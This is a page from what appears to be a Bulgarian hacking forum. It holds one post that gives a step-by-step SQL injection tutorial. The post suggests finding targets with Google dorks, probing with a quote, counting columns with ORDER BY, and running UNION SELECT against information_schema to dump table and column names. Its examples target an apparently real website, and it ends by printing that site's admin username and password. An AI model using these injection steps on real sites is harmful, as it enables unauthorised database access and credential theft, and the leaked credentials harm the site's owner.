Jump to content
ТУК НЕ СЕ ПРЕДЛАГАТ ХАКЕРСКИ УСЛУГИ ! ×

Leaderboard

Popular Content

Showing content with the highest reputation on 06/03/2019 in all areas

  1. SQL инжекция е техника на инжектиране код който използва уязвимост в сигурността срещащи се в базата данни на слой на заявление. Уязвимостта е налице когато приноса на потребителите е било неправилно филтриран. За низовите евакуационните знаци, вградени в SQL изявления или приноса на потребителите не е строго въведена и по този начин неочаквано екзекутиран. Това е пример за по-общ клас уязвимости, които могат да възникнат, когато един програмен или скриптов език е вграден в друг. SQL инжекция атаки също са известни като SQL инсерция атаки. Стъпка 1: Намерете уеб сайт, който е уязвим за атаката. Предоставям ви няколко доркове [Dorks] (Дорк-а се търси в Google). Dorks: Също така можете вие да си напишете и вашият собствен дорк ! Как да проверите дали дадена уеб страница е уязвима от тази атака ? След като изпълните 1 от дорковете и да получите най-предпочитаните резултатите от търсенето. например : http://www.aps.ai/newsstory.php?id=8 Добави ' в края на страницата. http://www.aps.ai/newsstory.php?id=8' Ако страницата връща SQL грешка, че страницата е уязвима за SQLi продължавате. http://www.aps.ai/newsstory.php?id=8 order by 2-- няма грешка http://www.aps.ai/newsstory.php?id=8 order by 6-- няма грешка http://www.aps.ai/newsstory.php?id=8 order by 7--връща грешка когато ви върне грешка примерно на 7 означава че колоните са по малко и пишете order by 6-- ако върне отново грешка при 6 значи са по малко пробвате до когато намерите броя При връщане на грешка продължаваме със следваща стъпка по интересна : http://www.aps.ai/newsstory.php?id=-8 union select 1,2,3,4,5,6-- Това което връща 2 е уязвимата колона [Column] означава че ще трябва да продалжим атаката варху нея ето ви и снимка :Д http://i.imgur.com/AaXsSFA.png Продалжаваме все на по дълбоко към целта : http://www.aps.ai/newsstory.php?id=-8 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Това което виждате са таблиците http://i.imgur.com/reCOw7F.png Запазвате в тхт файл това което ви трябва примерно на мен ми трябва таблицата : tbl_admin след тази стъпка трябва да знаете и имената на колоните това става само с 2 стъпки гледайте внимателно http://www.aps.ai/newsstory.php?id=-8 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- http://i.imgur.com/dEdkah4.png и от тука запазете username,pass Когато погледнете малко по нагоре в темата ще видите същия код само че с техт table tables ето ви и снимка за да видите точно за какво става въпрос http://i.imgur.com/1yOLnml.png Така да продалжим напред последното което трябва да направите след всички тези стъпки е да разберете какав е потребителското име и паролата на администратора как ще го направим след като вече видяхме таблиците и колоните ви казах да запазите важната информация която ще ви потрябва за да намерите потребителско име и парола аз запазих тези неща който на мен ми трябват споделям ги и с вас име на таблицата [tbl_admin] колони : username , pass сега ще видим заедно какво ще се случи : http://www.aps.ai/newsstory.php?id=-8 union select 1,group_concat(username,0x3a,pass),3,4,5,6 from tbl_admin-- ето ги username : admin password : $t@mPs@Xa Приятно учене :) уроците са стари може да се срещнете със неработещи линкове.
    1 point
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.